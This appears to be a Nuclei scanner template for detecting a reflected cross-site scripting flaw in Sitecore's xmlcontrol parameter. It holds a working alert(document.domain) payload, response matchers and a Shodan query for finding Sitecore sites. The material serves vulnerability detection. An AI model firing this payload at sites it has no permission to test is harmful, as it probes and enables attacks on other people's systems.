id: sitecore-xml-xss

info:
  name: SiteCore XML Control Script Insertion
  author: DhiyaneshDK
  severity: medium
  description: |
    Sitecores “special way” of displaying XML Controls directly allows for a Cross Site Scripting Attack – more can be achieved with these XML Controls
  reference: |
    - https://vulners.com/securityvulns/SECURITYVULNS:DOC:30273
    - https://web.archive.org/web/20151016072340/http://www.securityfocus.com/archive/1/530901/100/0/threaded
  metadata:
    verified: "true"
    max-request: 1
    shodan-query: html:"Sitecore"
  tags: xss,sitecore,cms

http:
  - method: GET
    path:
      - "{{BaseURL}}/?xmlcontrol=body%20onload=alert(document.domain)"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<body onload=alert(document.domain) />"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

# digest: 4a0a00473045022050a33d1e8d168b7a9ba886b1f58923cc292c3a53bc0d5c3eab7fa010ac80a5a4022100c2f3d55ef7064d8b24c06eecf38ee7308b5f5d8c5b18284c03fca9553631f311:922c64590222798bb761d5b6d8e72950